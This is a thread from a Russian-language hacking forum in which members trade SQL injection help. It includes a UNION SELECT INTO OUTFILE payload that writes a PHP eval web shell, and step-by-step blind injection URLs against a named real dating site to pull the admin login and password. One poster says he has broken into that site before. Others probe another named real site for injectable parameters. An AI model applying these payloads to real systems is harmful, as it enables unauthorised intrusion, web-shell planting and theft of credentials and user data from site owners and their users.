Старый 09.03.2012, 12:57   #1791
Pashka
 
Регистрация: 09.03.2012
Сообщений: 9
Репутация: -5
По умолчанию

А можно ли залить шел через sql-inj
Pashka вне форума   Ответить с цитированием
Старый 09.03.2012, 13:45   #1792
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

select into outfile
12309 вне форума   Ответить с цитированием
Старый 10.03.2012, 00:32   #1793
Pashka
 
Регистрация: 09.03.2012
Сообщений: 9
Репутация: -5
По умолчанию

Помогите пожалуйста.Посмотрите правильно ли я добавил запрос для заливки шела,ато мне ошибку выдает http://localhost/Tests/dira/new.php?id=-1+union+select+1,2,'<?php eval($_REQUEST[cmd]); ?>',4,5+from+mysql.user+into+outfile+'W:/home/localhost/www/Tests/wso2.php'-- вот ошибка сама File 'W:/home/localhost/www/Tests/wso2.php' already exists
Pashka вне форума   Ответить с цитированием
Старый 10.03.2012, 02:29   #1794
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 354
Репутация: 105
По умолчанию

мда, не пробывал юзать мозг и перевести ошибку? Думаю не сложно, всего лишь три слова File already exists
b3 вне форума   Ответить с цитированием
Старый 10.03.2012, 11:30   #1795
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:

Код:
HTTP/1.1 500 Internal Server Error
Date: Sat, 10 Mar 2012 09:07:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9201

<html>
    <head>
        <title>Conversione non riuscita durante la conversione del valore nvarchar 'u:baudo@apre.it' nel tipo di dati int.</title>
        <style>
но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема?
durito вне форума   Ответить с цитированием
Старый 10.03.2012, 12:51   #1796
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Pashka,
файл уже существует.
durito,
ответил на ачате.
Ereeee вне форума   Ответить с цитированием
Старый 10.03.2012, 13:19   #1797
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Помогите раскрутить или сделать вывод. Mysql >=5
error based не получается, подзапросами выводит пустые данные. У самого не выходит.
Код:
http://slinky.com.au/search_result.php?ID=&NickName=&p_per_page=10&sortorder=&sortby=&profiles=&status=&featured=&photos_only=&distance=&metric=&zip=&gallery_view=0&City_Quick_Search=hmmm-14&Sex=male&LookingFor=female'<inj>
Consistent вне форума   Ответить с цитированием
Старый 10.03.2012, 13:47   #1798
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Consistent,
Error-based не прокатит. Вывода ошибки нет(простого вывода тоже не нашел пока), только запрос показан. Mq=on. Остается вариант:
Цитата:
http://slinky.com.au/search_result.php?Sex=male&LookingFor=female&DateO fBirth_start=18&DateOfBirth_end=76&City_Quick_Sear ch=All-0) AND (substring(version(),1,1)=5
Вот WP:
Цитата:
http://www.slinky.com.au/online-dating/wp-login.php?redirect_to=http%3A%2F%2Fwww.slinky.com. au%2Fonline-dating%2Fwp-admin%2F&reauth=1
Идея понятна)

P.S. Ищу вывод....
Ereeee вне форума   Ответить с цитированием
Старый 10.03.2012, 17:06   #1799
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

Consistent,
Ereeee

так как это aeDating версии 4 и выше то таблицы по умолчанию


`Admins`

`Name`
`Password`

http://www.slinky.com.au/admin/

в самой админке, она кстати похоже была сделана на основе админки Dolphin Web Community Software от http://www.boonex.com, есть возможность экспорта любых данных из базы - manage database

но вот вариант

http://slinky.com.au/search_result.php?Sex=male&LookingFor=female&DateO %20fBirth_start=18&DateOfBirth_end=76&City_Quick_S earch=All-0%29%20AND%20ascii%28substring%28%28SELECT%20Name% 20from%20Admins%20limit%200,1%29,1,1%29%29=96

выпадает с ошибкой

идем другим путем:

http://www.slinky.com.au/search_result.php?Sex=male&LookingFor=female&DateO fBirth_start=18&DateOfBirth_end=76&City_Quick_Sear ch=Victoria-4%2C5%2C6%2C7+and+1=1

видим showing page 1 of 134

http://www.slinky.com.au/search_result.php?Sex=male&LookingFor=female&DateO fBirth_start=18&DateOfBirth_end=76&City_Quick_Sear ch=Victoria-4%2C5%2C6%2C7+and+1=2

showing page 1 of 205

http://www.slinky.com.au/search_result.php?Sex=male&LookingFor=female&DateO fBirth_start=18&DateOfBirth_end=76&City_Quick_Sear ch=Victoria-4%2C5%2C6%2C7+and+ascii%28substring%28%28SELECT%20 CONCAT%28Name,%20CHAR%28124%29,%20Password%29%20fr om%20Admins+limit+0,1%29,1,1%29%29=97

showing page 1 of 134

первая буква логина админа а

собственно так и крутим

кстати там 37К юзеров только я уже где-то полгода назад ломал его, через параметр sex в этом же скрипте, но похожу багу в нем уже пофиксили установкой апдейта.

кстати в админке есть инфа и по установленным апдейтам, тут версия Based on AEdating v4 Patch 2
durito вне форума   Ответить с цитированием
Старый 10.03.2012, 20:15   #1800
xanxy
 
Регистрация: 06.11.2011
Сообщений: 5
Репутация: 1
По умолчанию

Нашел такую инъекцию
Цитата:
lernia[dot]se/jobb/Lediga-jobb/Jobbannons/?JobbAnnonsId=IP1231'AND'1'='1
Не могу понять что за бд, тк не одна проверка описанная в Шпаргалке не подходит.
Методом научного тыка обнаружилось что ) закрывает запрос
Цитата:
lernia[dot]se/jobb/Lediga-jobb/Jobbannons/?JobbAnnonsId=IP1231')
В текущем селекте скорее всего 23 колонки:
Цитата:
lernia[dot]se/jobb/Lediga-jobb/Jobbannons/?JobbAnnonsId=IP1231' ORDER BY 23)
То что пишется после UNION просто игнорится
Цитата:
lernia[dot]se/jobb/Lediga-jobb/Jobbannons/?JobbAnnonsId=IP1231' UNION xxxx)
Видимо UNION просто не поддерживается и добавлен для совместимости
xanxy вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot